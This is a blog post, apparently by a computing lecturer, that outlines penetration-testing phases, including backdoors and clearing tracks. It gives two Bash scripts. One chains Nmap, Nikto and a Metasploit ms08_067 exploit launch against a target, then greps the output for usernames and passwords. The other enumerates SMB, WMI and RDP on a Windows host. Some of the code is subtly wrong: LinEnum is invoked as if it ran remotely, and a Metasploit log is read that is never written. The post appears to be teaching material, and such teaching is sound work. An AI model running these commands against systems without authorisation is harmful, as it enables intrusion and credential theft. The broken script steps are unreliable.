Common tasks for penetration testing

Penetration testing, also known as “pen testing” or “ethical hacking,” is a method of evaluating the security of a computer system, network, or web application by simulating an attack from a malicious actor. The goal of penetration testing is to identify vulnerabilities and weaknesses in a system that could be exploited by a real attacker.

Penetration testing typically includes a combination of manual and automated techniques, such as:

Reconnaissance: Gathering information about the target system, such as IP addresses, open ports, and software versions.

Vulnerability scanning: Identifying known vulnerabilities in the target system.

Exploitation: Attempting to exploit identified vulnerabilities to gain access to the system.

Privilege escalation: Attempting to gain higher levels of access to the system once initial access has been gained.

Maintaining access: Establishing ways to retain access to the system, such as creating backdoors.

Clearing tracks: Attempting to cover tracks and remove any traces of the penetration test.

Reporting: Documenting findings and recommendations for remediation.

Here is an example of a simple Bash script that can automate some of the common tasks in penetration testing:

#!/bin/bash

# Store the target IP address in a variable
target="192.168.1.1"

# Use Nmap to scan for open ports and services
nmap -sS -sV -O -A -T4 $target -oA nmap_scan

# Use Nikto to perform a vulnerability scan on a web server
nikto -h http://$target -o nikto_scan.txt

# Use Metasploit to launch an exploit against the target
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST $target; exploit"

# Use Linenum to gather information about the target system
./linenum.sh -r $target > linenum_output.txt

# Use grep to search through the output files and extract relevant information
grep -i "username" linenum_output.txt > user_info.txt
grep -i "password" linenum_output.txt > password_info.txt

# Create a report with the results of the penetration test
echo "Penetration Test Report for $target" > report.txt
echo "-------------------------------------------------" >> report.txt
echo "" >> report.txt
echo "Open Ports and Services:" >> report.txt
cat nmap_scan.nmap >> report.txt
echo "" >> report.txt
echo "Vulnerabilities:" >> report.txt
cat nikto_scan.txt >> report.txt
echo "" >> report.txt
echo "Exploits Used:" >> report.txt
cat msf.log >> report.txt
echo "" >> report.txt
echo "Information Gathered:" >> report.txt
cat user_info.txt >> report.txt
echo "" >> report.txt
cat password_info.txt >> report.txt

This script uses a few different tools to perform a basic penetration test on the target IP address. It starts by using Nmap to scan for open ports and services, then uses Nikto to perform a vulnerability scan on a web server, and then uses Metasploit to launch an exploit against the target system. Finally, creates a report.txt file with all the results from the penetration testing.

Here’s another example of a simple Bash script that can be used to perform some basic reconnaissance on a Windows server as part of a penetration testing engagement:

#!/bin/bash

# Define the target IP address or hostname
target="192.168.1.1"

# Perform a port scan using Nmap
nmap -p139,445 $target -oG - | grep "open"

# Perform a SMB enumeration using enum4linux
enum4linux -a $target

# Perform a WMI query to gather information about the system
wmic --user=[username] --password=[password] //$target 'select * from win32_operatingsystem'

# Perform a check for open shares
smbclient -L $target

# Perform a check for open RDP service
nmap -p 3389 $target

This script uses Nmap to perform a port scan on the target Windows server, looking for open ports 139 and 445, which are commonly used for SMB (Server Message Block) protocol. Then it uses enum4linux to perform an SMB enumeration on the target server, gathering information about the system and users. The script also uses WMI (Windows Management Instrumentation) to query the target server for information about the operating system and installed software. Additionally, the script uses smbclient and Nmap to check for open file shares and open RDP service on the target server respectively.

Please note that, like in the previous script, this is just a simple example of what a penetration testing script could look like and it may not include all necessary steps for a comprehensive penetration testing engagement, also some of the steps in this script may not be legal in all countries, and should be used with permission. Also, the results and the way you interpret them may vary based on the target and the environment and there’s a lot more to penetration testing than running a script.

Andreas Bourakis

Software Engineer & Lecturer in Computing

Leave a Reply